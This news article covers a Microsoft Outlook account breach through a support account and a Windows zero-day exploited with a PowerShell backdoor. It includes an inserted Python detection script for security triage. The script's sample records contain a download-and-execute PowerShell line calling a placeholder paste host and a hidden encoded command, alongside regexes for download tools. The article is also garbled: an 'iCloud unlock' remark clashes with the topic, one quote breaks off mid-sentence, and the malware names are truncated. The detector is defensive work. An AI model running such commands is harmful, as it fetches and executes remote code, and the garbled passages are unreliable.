Microsoft has admitted that a group of hackers had access to the credentials of numerous personal Outlook accounts, as well as to e-mail information, between January and March.

Microsoft has not announced how many accounts were compromised. However, the Redmond company stated that it immediately disabled the compromised credentials, and it offered one piece of advice: change your password.

According to a source close to the company cited by Darktrace, the situation is much more serious than officially declared: the hackers reportedly gained access to a Microsoft customer-support account, and thereby full access to many Outlook, MSN and Hotmail mailboxes.

Comment by Dave Palmer of Darktrace

Dave Palmer, Director of Technology at Darktrace, commented as follows.

Today’s case once again reveals the complexity and unpredictability of cyber threats. iCloud unlock has been designed to improve security, but it also represents a treasure trove for hackers, because it increases interconnection.

As the complexity of digital defenses increases, hackers increasingly resort to social engineering techniques; in this case they chose to target a member of Microsoft’s technical support in order to abuse their privileged access. From what we have discovered, some users have had metadata relating to their mail account stolen (e.g. the names of their contacts), and some have had email messages read.

It is clear that email providers will not be able to sleep peacefully. The data collected can then be used to mount further attacks, for example to send highly targeted spear-phishing emails, so those who have already suffered this type of breach should be more alert, especially when downloading files or clicking on links.

In this attack, corporate accounts were spared, but the same risk applies to companies that use third parties as email providers. Cloud email services offer a host of benefits, but they have become increasingly profitable targets, as they are used to host sensitive information from thousands of companies.

That is why it is time for corporate leaders to adopt cutting-edge technologies to address this evolving challenge. Cyber AI goes beyond identifying known threats, because it can detect extremely subtle deviations in digital activity and fight emerging dangers autonomously.

Kaspersky Lab detected a flaw in Windows

As if the hackers were not enough, Kaspersky Lab detected a previously unknown vulnerability in Microsoft Windows. This vulnerability, says Kaspersky Lab, has been exploited by an unknown group of cybercriminals who were trying to gain full control of the devices they targeted. The attack aimed at the core of the operating system, the kernel, through a backdoor built from an essential component of the Windows OS.

Backdoors, Kaspersky Lab explains, are an extremely dangerous type of malware. They allow threat actors to control infected machines unnoticed in order to carry out their malicious purposes. A “privilege escalation” of this type, carried out by a third party, is difficult to hide from security solutions. Despite this, a backdoor that exploits a previously unknown bug present within the system, i.e. a zero-day vulnerability, has a much greater chance of going unnoticed. Ordinary security solutions cannot recognize the infection of the system, nor can they protect users from a threat that has yet to be discovered.

Kaspersky Lab’s Exploit Prevention technology nevertheless managed to detect the attempted exploitation of an unknown vulnerability within the Microsoft Windows operating system. Kaspersky Lab then described the attack scenario it had discovered.

How the attack happens

After the launch of the malicious .exe file, Kaspersky Lab explains, the installation of the malware began. The infection exploited a zero-day vulnerability to obtain the privileges needed to persist on the victim’s machine. The malware then launched a backdoor built with a legitimate Windows component present on every computer running this operating system: Windows PowerShell, a command-line shell, scripting language and automation framework.

This allowed the threat actors to move stealthily within the system and avoid detection, while saving the time it would take to write their own malicious tools. The malware then downloaded another backdoor from a popular, legitimate text storage service, which in turn gave the criminals full control of the infected system.
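The two behaviours described above (PowerShell pulling a second stage from a public text-storage service and running it in memory) leave traces in script-block logging. The following triage routine is an added example written for this article, not Kaspersky Lab’s or Microsoft’s code; the paste-service host names and the Event ID 4104-style log records are constructed placeholders.

```python
"""Triage PowerShell script-block text for second-stage download from a
text-storage (paste) service and in-memory execution of the result."""
import re

# Constructed placeholder list: public paste hosts that managed endpoints
# should not normally be fetching scripts from.
PASTE_HOSTS = {"paste.example", "textbin.example"}

DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
    r"DownloadFile|curl|wget)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
IN_MEMORY_EXEC_RE = re.compile(
    r"\b(?:Invoke-Expression|iex)\b|\[ScriptBlock\]::Create", re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob of at least 20 chars
ENCODED_RE = re.compile(
    r"(?<!\S)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)


def triage_script_block(text: str) -> list[str]:
    """Return the reasons a script block is suspicious; empty list means clean."""
    reasons = []
    hosts = {h.lower() for h in URL_RE.findall(text)}
    paste = hosts & PASTE_HOSTS
    downloads = DOWNLOAD_RE.search(text) is not None
    if paste and downloads:
        reasons.append(f"download from text-storage service: {sorted(paste)[0]}")
    if downloads and IN_MEMORY_EXEC_RE.search(text):
        reasons.append("downloaded content executed in memory")
    if ENCODED_RE.search(text):
        reasons.append("encoded command")
    return reasons


# Constructed records in the shape of Event ID 4104 (EventID, ScriptBlockText).
SAMPLE_EVENTS = [
    ("4104", "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    ("4104", "iex (New-Object Net.WebClient).DownloadString('https://paste.example/raw/abc123')"),
    ("4104", "Invoke-WebRequest https://updates.example/agent.msi -OutFile C:\\Temp\\agent.msi"),
    ("4104", "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
]


def triage_events(events):
    """Return (index, reasons) for every record that triggered at least one rule."""
    return [(i, r) for i, (_eid, text) in enumerate(events)
            if (r := triage_script_block(text))]


if __name__ == "__main__":
    for idx, reasons in triage_events(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

The legitimate installer download in the third record is deliberately left unflagged: the rule fires on the combination of an unusual source and in-memory execution, not on downloads as such.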

• “In this type of attack, we have observed the two main trends that we often see when analyzing Advanced Persistent Threats (APTs). First of all, the use of exploits to carry out a local ‘privilege escalation’ so as to obtain a persistent presence on the victim’s computer. Secondly, the use of legitimate frameworks like Windows PowerShell for malicious activity on the victim’s computer. This combination of factors allows the threat actors to bypass standard security solutions. To detect this type of technique, the security solution must use”, Anton Ivanov, Security Expert at Kaspersky Lab, explained.

Kaspersky Lab products have detected this exploit as:

• HEUR:Exploit.Win32.

• HEUR:Trojan.Win32.

• PDM:Exploit.Win32.

The vulnerability, Kaspersky Lab reports, was disclosed to Microsoft and was resolved on April 10.

Kaspersky Lab’s Advice

To prevent the installation of a backdoor through the exploitation of possible zero-day vulnerabilities in Windows, Kaspersky Lab recommends taking the following security measures.

• Once the vulnerability has been resolved and the patch has been downloaded, the threat actors lose the opportunity to use it. It is therefore important to install the Microsoft patch for the new vulnerability as soon as possible.

• If you are concerned about the security status of your organization, make sure you regularly update all software whenever a new security patch is released. Use security solutions with patch management capabilities to ensure that these processes are performed automatically.

• Use an effective security solution with behavior-based detection capabilities to protect against unknown threats, such as Kaspersky Endpoint Security.

• Make sure the security team has access to the most recent threat intelligence. Private reports on the latest developments in the threat landscape are available to Kaspersky Intelligence Reporting subscribers.

• Last but not least: make sure your staff is trained in the basics of cybersecurity hygiene.

More information about the new exploit discovered by Kaspersky Lab is available in the full report on the Securelist blog.

More information about Kaspersky Lab is available on the company’s website at this link.
